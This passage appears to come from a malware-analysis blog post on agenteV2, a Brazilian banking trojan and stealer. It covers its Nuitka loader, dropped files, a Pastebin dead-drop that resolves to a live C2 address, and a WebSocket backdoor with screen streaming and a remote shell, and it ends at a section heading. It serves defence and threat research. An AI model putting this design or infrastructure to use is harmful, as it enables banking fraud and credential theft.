<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="715" height="526" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_5.png" alt="" class="wp-image-20425" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_5.png 715w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_5-300x221.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_5-370x272.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_5-270x199.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_5-80x60.png 80w" sizes="(max-width: 715px) 100vw, 715px" /><figcaption class="wp-element-caption"><em>wifi_driver.exe showing&nbsp;Nuitka&nbsp;onefile&nbsp;container signature, PE characteristics, Python 3.13 runtime</em></figcaption></figure>



<p>wifi_driver.exe is a self-contained onefile bundle (PyInstaller or Nuitka container mode). It contains no malicious logic of its own. Its sole purpose is to:</p>



<ul class="wp-block-list">
<li>Extract the full Python 3.13 runtime environment to a temporary directory (Temp\onefile_&lt;PID&gt;_&lt;timestamp&gt;\);</li>



<li>Extract all required .pyd extensions and native DLLs alongside the runtime;</li>



<li>Load and execute agenteV2_historico_detect.dll the actual payload;</li>



<li>Clean up the extraction directory on exit.</li>
</ul>



<p><strong>Reverse engineering path for wifi_driver.exe:&nbsp;</strong></p>



<ul class="wp-block-list">
<li>If&nbsp;PyInstaller: use pyinstxtractor.py to unpack the bundle →&nbsp;locate&nbsp;main.pyc&nbsp;(or file named after the executable) → decompile with&nbsp;pycdc&nbsp;to recover readable Python&nbsp;source;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>If&nbsp;Nuitka&nbsp;container mode: the bootstrap code is minimal C focus effort on the extracted DLL, not the&nbsp;container;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>The container itself is not the analytical&nbsp;target it&nbsp;is merely the delivery mechanism for the DLL.&nbsp;</li>
</ul>



<p>Extracted runtime components dropped to Temp\onefile_&lt;PID&gt;\ by wifi_driver.exe:&nbsp;</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-297"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="17"
           data-wpID="297"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014 wpdt-bc-03A9F4"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:27.176781002639%;                    padding:10px;
                    "
                    >
                                        File                     </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014 wpdt-bc-03A9F4"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:13.192612137203%;                    padding:10px;
                    "
                    >
                                        Size                     </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014 wpdt-bc-03A9F4"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:59.630606860158%;                    padding:10px;
                    "
                    >
                                        Purpose                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        python313.dll                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        6 MB                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Python 3.13 interpreter main runtime                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        python3.dll                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        72 KB                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Python stable ABI shim                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        vcruntime140.dll                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        118 KB                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        MSVC runtime (C++ support)                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        libcrypto-3.dll                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        5 MB                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        OpenSSL crypto TLS for C2 comms                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        libssl-3.dll                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        776 KB                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        OpenSSL TLS encrypted C2 channel                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        sqlite3.dll                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        2 MB                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C7"
                    data-col-index="2"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        SQLite engine reading browser credential DBs                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        _sqlite3.pyd                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        128 KB                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C8"
                    data-col-index="2"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Python SQLite bindings                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A9"
                    data-col-index="0"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        PIL/_imaging.pyd                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="B9"
                    data-col-index="1"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        2 MB                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C9"
                    data-col-index="2"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        Pillow core screen capture                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A10"
                    data-col-index="0"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        PIL/_imagingcms.pyd                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="B10"
                    data-col-index="1"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        264 KB                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C10"
                    data-col-index="2"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        Pillow CMS image processing                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A11"
                    data-col-index="0"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        psutil/_psutil_windows.pyd                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="B11"
                    data-col-index="1"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        69 KB                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C11"
                    data-col-index="2"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        Process enumeration kill browsers before DB access, anti-VM checks                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A12"
                    data-col-index="0"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        _wmi.pyd                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="B12"
                    data-col-index="1"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        39 KB                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C12"
                    data-col-index="2"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        WMI bindings system fingerprinting (UUID, hostname, OS version)                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A13"
                    data-col-index="0"
                    data-row-index="12"
                    style="                    padding:10px;
                    "
                    >
                                        _ssl.pyd                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="B13"
                    data-col-index="1"
                    data-row-index="12"
                    style="                    padding:10px;
                    "
                    >
                                        178 KB                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C13"
                    data-col-index="2"
                    data-row-index="12"
                    style="                    padding:10px;
                    "
                    >
                                        Python SSL bindings HTTPS for C2/Pastebin                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A14"
                    data-col-index="0"
                    data-row-index="13"
                    style="                    padding:10px;
                    "
                    >
                                        certifi/cacert.pem                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="B14"
                    data-col-index="1"
                    data-row-index="13"
                    style="                    padding:10px;
                    "
                    >
                                        266 KB                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C14"
                    data-col-index="2"
                    data-row-index="13"
                    style="                    padding:10px;
                    "
                    >
                                        Trusted CA bundle validates Pastebin and C2 TLS certs                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A15"
                    data-col-index="0"
                    data-row-index="14"
                    style="                    padding:10px;
                    "
                    >
                                        charset_normalizer/*.pyd                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="B15"
                    data-col-index="1"
                    data-row-index="14"
                    style="                    padding:10px;
                    "
                    >
                                        22 KB                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C15"
                    data-col-index="2"
                    data-row-index="14"
                    style="                    padding:10px;
                    "
                    >
                                        Text encoding detection handles multi-encoding victim data                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A16"
                    data-col-index="0"
                    data-row-index="15"
                    style="                    padding:10px;
                    "
                    >
                                        81d243bd__mypyc.pyd                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="B16"
                    data-col-index="1"
                    data-row-index="15"
                    style="                    padding:10px;
                    "
                    >
                                        205 KB                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C16"
                    data-col-index="2"
                    data-row-index="15"
                    style="                    padding:10px;
                    "
                    >
                                        mypyc-compiled auxiliary module additional compilation layer                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A17"
                    data-col-index="0"
                    data-row-index="16"
                    style="                    padding:10px;
                    "
                    >
                                        agenteV2_historico_detect.dll                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="B17"
                    data-col-index="1"
                    data-row-index="16"
                    style="                    padding:10px;
                    "
                    >
                                        27 MB                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C17"
                    data-col-index="2"
                    data-row-index="16"
                    style="                    padding:10px;
                    "
                    >
                                        Complete CORE STEALER malicious logic                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-297'>
table#wpdtSimpleTable-297{ table-layout: fixed !important; }
table#wpdtSimpleTable-297 td, table.wpdtSimpleTable297 th { white-space: normal !important; }
.wpdt-fs-000014 { font-size: 14px !important;}
.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}
.wpdt-fs-000012 { font-size: 12px !important;}
</style>




<p><strong>agenteV2_historico_detect.dll Core Stealer (Nuitka)</strong>&nbsp;</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="715" height="524" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_6.png" alt="" class="wp-image-20435" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_6.png 715w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_6-300x220.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_6-370x271.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_6-270x198.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_6-80x60.png 80w" sizes="(max-width: 715px) 100vw, 715px" /><figcaption class="wp-element-caption"><em>agenteV2_historico_detect.dll confirming&nbsp;Nuitka&nbsp;compilation, native PE DLL, no extractable bytecode</em></figcaption></figure>



<p>This DLL is the analytical target it&nbsp;contains&nbsp;all malicious logic. The original Python source was compiled with&nbsp;Nuitka&nbsp;(Python → C++ → native machine code), producing a monolithic 27 MB PE DLL with no extractable bytecode.&nbsp;pyinstxtractor&nbsp;and uncompyle6 do not apply here.</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-298"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="2"
           data-rows="9"
           data-wpID="298"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-fs-000014 wpdt-bold wpdt-bc-03A9F4"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:16.551724137931%;                    padding:10px;
                    "
                    >
                                        Property                     </th>
                                                <th class="wpdt-cell wpdt-fs-000014 wpdt-bold wpdt-bc-03A9F4"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:83.448275862069%;                    padding:10px;
                    "
                    >
                                        Value                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Compiler                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Nuitka (Python → C++ → native machine code)                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        File Size                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        27,430,848 bytes (~27 MB) statically linked dependencies + Nuitka runtime bloat                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        MD5                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        826d6350724f203b911aa6c8c4626391                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Bytecode                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        None not extractable; full native RE required (IDA Pro / Ghidra)                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        RE Difficulty                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        High ~90% of code is Nuitka boilerplate + CPython internals; malicious logic is a small fraction                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Classification                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Interactive Banking Trojan + Information Stealer not a passive exfiltrator                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Name (internal)                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        agenteV2 'V2' implies prior version in circulation; active development confirmed                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-fs-000012"
                                            data-cell-id="A9"
                    data-col-index="0"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        OpSec quality                     </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B9"
                    data-col-index="1"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        Poor verbose debug strings, original variable/function names, and cleartext URLs left intact                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-298'>
table#wpdtSimpleTable-298{ table-layout: fixed !important; }
table#wpdtSimpleTable-298 td, table.wpdtSimpleTable298 th { white-space: normal !important; }
.wpdt-fs-000014 { font-size: 14px !important;}
.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}
.wpdt-fs-000012 { font-size: 12px !important;}
</style>




<p>Despite robust&nbsp;Nuitka&nbsp;compilation, the threat actor&nbsp;failed to&nbsp;strip debug symbols, variable names, and&nbsp;cleartext&nbsp;strings from the binary exposing the full execution flow via static .rdata&nbsp;analysis. This is a recurring pattern in Brazilian malware: technically capable packaging decisions paired with poor operational security discipline.&nbsp;<br>&nbsp;<br><strong>Core Capabilities (Reconstructed from Static + Dynamic Analysis):&nbsp;</strong>&nbsp;</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="689" height="143" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_7.png" alt="" class="wp-image-20440" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_7.png 689w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_7-300x62.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_7-370x77.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_7-270x56.png 270w" sizes="(max-width: 689px) 100vw, 689px" /><figcaption class="wp-element-caption"><em>agenteV2_historico_detect.dll .rdata: parsing string, banking target arrays, anti-fraud product paths</em></figcaption></figure>



<p>The malware does not hardcode the C2 address. It queries a Pastebin URL to dynamically retrieve the active C2 IP and port, enabling infrastructure rotation without redeployment:&nbsp;</p>



<pre class="wp-block-code"><code>Dead-Drop URL:  https://pastebin.com/raw/0RmxqY57 
Resolved C2:    38.242.246.176:8443 </code></pre>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-299"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="6"
           data-wpID="299"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:41.943127962085%;                    padding:10px;
                    "
                    >
                                        String (.rdata)                     </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:18.601895734597%;                    padding:10px;
                    "
                    >
                                        Address                     </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:39.454976303318%;                    padding:10px;
                    "
                    >
                                        Role                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000014"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        a PASTEBIN_URL                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000014"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        0x1812987ED                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000014"
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Variable storing the dead-drop URL                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000014"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        <a href="https://pastebin.com/raw/0RmxqY57 " target="_blank">https://pastebin.com/raw/0RmxqY57 </a>                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000014"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        0x1812993F0                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000014"
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Hardcoded Pastebin raw URL                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000014"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Busca IP e Porta Base do Pastebin. Retorna (ip, port) ou None                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000014"
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        0x18129889B                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000014"
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Resolver function docstring returns (ip, port) tuple                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000014"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Erro: Porta no pastebin n...                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000014"
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        0x18129884C                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000014"
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Error handler: malformed port in Pastebin content                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000014"
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Erro ao ler Pastebin:                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000014"
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        0x181298881                     </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000014"
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Error handler: Pastebin fetch failure                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-299'>
table#wpdtSimpleTable-299{ table-layout: fixed !important; }
table#wpdtSimpleTable-299 td, table.wpdtSimpleTable299 th { white-space: normal !important; }
.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}
.wpdt-fs-000014 { font-size: 14px !important;}
</style>




<h4 class="wp-block-heading"><em>4.1.&nbsp;Persistent WebSocket Backdoor Interactive Agent</em>&nbsp;</h4>



<p>Unlike typical stealers that perform a single HTTP POST exfiltration and&nbsp;terminate, agenteV2 establishes a persistent WebSocket connection (uws:// scheme) to the C2. This architecture enables real-time, bidirectional communication making it function as a full interactive backdoor rather than a passive stealer:&nbsp;</p>



<ul class="wp-block-list">
<li>Continuous screen capture stream using PIL (Pillow) and&nbsp;mss&nbsp;libraries frames encoded as JPEG and streamed live to the&nbsp;operator;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Interactive remote shell via&nbsp;CMD:SHELL: command prefix commands dispatched through&nbsp;subprocess.Popen, output returned over the&nbsp;WebSocket;&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li>Real-time telemetry: live operator visibility into the victim&#8217;s desktop session.&nbsp;</li>
</ul>



<p>This design is&nbsp;optimized&nbsp;for manual, real-time financial fraud.&nbsp;The&nbsp;operator can watch the&nbsp;victim&#8217;s&nbsp;screen, interact with open banking sessions, and issue commands on the fly.&nbsp;</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="946" height="134" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_8.png" alt="" class="wp-image-20445" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_8.png 946w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_8-300x42.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_8-768x109.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_8-370x52.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_8-270x38.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/brazil_8-740x105.png 740w" sizes="(max-width: 946px) 100vw, 946px" /><figcaption class="wp-element-caption"><em>IDA Pro / strings uws:// WebSocket scheme string,&nbsp;CMD:SHELL: command prefix,&nbsp;subprocess.Popen&nbsp;references in .rdata</em></figcaption></figure>



<h4 class="wp-block-heading"><em>4.2. Evasive Browser Credential Harvesting</em>&nbsp;</h4>



